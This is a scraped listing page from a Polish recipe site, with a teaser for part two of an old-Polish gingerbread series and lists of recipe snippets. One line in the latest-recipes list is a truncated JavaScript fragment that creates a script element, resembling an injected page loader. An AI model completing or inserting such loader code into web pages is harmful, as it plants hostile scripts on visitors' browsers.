Piernik staropolski - część II
Źródło: https://sprawdzonakuchnia.pl/piernik-staropolski-odcinek-ii/
W pierwszym wpisie z tej serii zastanawiałam się czy długie leżakowanie ciasta jest konieczne do tego, aby piernik był wyśmienity i smaczny. Zapewniam Was, że kilka dni leżakowania surowego ciasta wystarczy, aby piernik wyszedł wspaniały. Niekoniecznie trzeba przygotowywać ciasto tak jak za dawnych czasów na kilka tygodni przed świętami. Dziś dzielimy ciasto na trzy porcje i... Read More Artykuł Piernik staropolski - część II pochodzi z serwisu Sprawdzona Kuchnia.
Najnowsze przepisy
(function(){ zz99=document.createElement("script");zz99_=("o ⇖ 14
Proste połączenie ale zdecydowanie zawsze się sprawdza.... ⇖ 18
Miodownik bez jajek – mięciutki, puszysty i pięknie... ⇖ 21
Pyszny przepis na noodle z mięsem mielonym. Szybki,... ⇖ 20
Wyobraź sobie ten moment: wyjmujesz z piekarnika idealną... ⇖ 12
Przepisy z bloga
A więc jesień! Pełne słońca wspomnienia z wakacyjnych... ⇖ 100
Świąteczne ciastka czekoladowe z miękkim środkiem w... ⇖ 124
Świąteczne ciastka czekoladowe z miękkim środkiem w... ⇖ 228
Makaron udon jest to jeden z moich ulubionych makaronów.... ⇖ 273
Przepisy na czasie
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 356
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 261
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 209
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 177
Tulipany do barszczyku to znakomita propozycja podania... ⇖ 168
Pyszny miodownik z kakaową masą grysikową i z orzechami... ⇖ 150
Idealne danie na ciepło na imprezy, lub na obiad. Przepis... ⇖ 68
Domowe pralinki są smaczne, łatwe do zrobienia i... ⇖ 64









































